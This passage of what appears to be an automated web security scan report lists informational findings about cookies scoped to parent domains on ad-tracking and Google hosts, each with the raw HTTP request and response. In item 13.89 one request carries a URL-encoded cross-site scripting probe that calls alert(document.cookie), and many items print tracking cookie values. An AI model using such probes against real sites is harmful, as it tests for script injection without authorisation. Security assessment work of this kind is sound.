Set-Cookie: vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days
Content-Length: 0
Date: Mon, 24 Jan 2011 21:08:43 GMT

13.85. http://dave.willfork.com/slrnface/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dave.willfork.com
Path:	/slrnface/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 533313
Connection: close

<b-ua>

13.86. http://delb.opt.fimserve.com/fimbid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delb.opt.fimserve.com
Path:	/fimbid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: DMEXP=4; Domain=.opt.fimserve.com; Expires=Wed, 09-Feb-2011 02:05:10 GMT; Path=/
Set-Cookie: UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
Set-Cookie: RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 414
Date: Tue, 25 Jan 2011 02:05:10 GMT

window["AIIcb"]={"r":{"sb":250376,"s":"471D7F0124D207BA9A40CE442FD37ED1","ad":"http://delb.opt.fimserve.com/bidimp/?ek=AOb2kFWWo584nB3I07WnKWrRBKeP4UX2EIXzUl_oiuySRCRwepH6n3-YHiF_hVbgrMPpsVthY8EJlhEFk
...[SNIP]...

13.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

13.88. http://dp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dp.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?v=102&d=1&nwk=1&y=2&u=http%3A%2F%2Fwww.autobytel.com%2Fx22&r=http%3A%2F%2Fburp%2Fshow%2F31&rnd=989810 HTTP/1.1
Host: dp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=780z^4^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=780z^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0

13.89. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.abbreviations.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.abbreviations.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F32&po6wxt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 350
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 21:08:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 21:08:42 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 21:08:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:42 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscri
...[SNIP]...

13.90. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=feedburner-control-panel=WUwm58oBrG3PsoODTDjQ7A; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.91. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.92. http://groups.google.com/group/joomla-commits/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-commits/topics

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.93. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

13.94. http://groups.google.com/grphp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.95. http://hairmakeup.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hairmakeup.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:01:46 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0050179958343506
X-Served-In: 0.084240913391113
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.96. http://howto.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://howto.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:04:18 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0045561790466309
X-Served-In: 0.051589965820312
X-Served-By: h04
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.97. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=1970530412525028204; path=/; expires=Sun, 24-Apr-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 25-Jan-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=1970530412525028204; path=/; expires=Sun, 24-Apr-2011 22:36:29 GMT; domain=.adnxs.com; HttpOnly
Location: ...B
Date: Mon, 24 Jan 2011 22:36:29 GMT
Content-Length: 0
Connection: close

13.98. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=364&user=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 26-Jan-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; path=/; expires=Mon, 25-Apr-2011 01:35:49 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 25 Jan 2011 01:35:49 GMT

GIF89a.............!.......,........@..L..;

13.99. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PA7vgjYL7Y-oMOJ=p+lV]xJ%3sbz?+-ptW1B'#)hgVCgQw>7'NF7uNVjSVPN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(EQzz#'-BocTIpdXA^TyXBajZK%mtyOeCVqSq?#P0kc+J(5SDVB>Zk=; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=65890&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 26-Jan-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PA7vgjYL7Y-oMOJ=p+lV]xJ%3sbz?+-ptW1B'#)hgVCgQw>7'NF7uNVjSVPN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(EQzz#'-BocTIpdXA^TyXBajZK%mtyOeCVqSq?#P0kc+J(5SDVB>Zk=; path=/; expires=Mon, 25-Apr-2011 01:35:47 GMT; domain=.adnxs.com; HttpOnly
Location: http://redcated/ADO/view/278612728/direct;wi.1;hi.1/01
Date: Tue, 25 Jan 2011 01:35:47 GMT
Content-Length: 0

13.100. http://id.google.com/verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=43=yThlFMrnGBFw9FkRw3x0I7VYQdh_YKYEC0XnuKxC8A=O5FCzgMvUYm0AvQP; expires=Tue, 26-Jul-2011 22:19:42 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAKBO9UY0zgnYsHCeZqjfAho.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
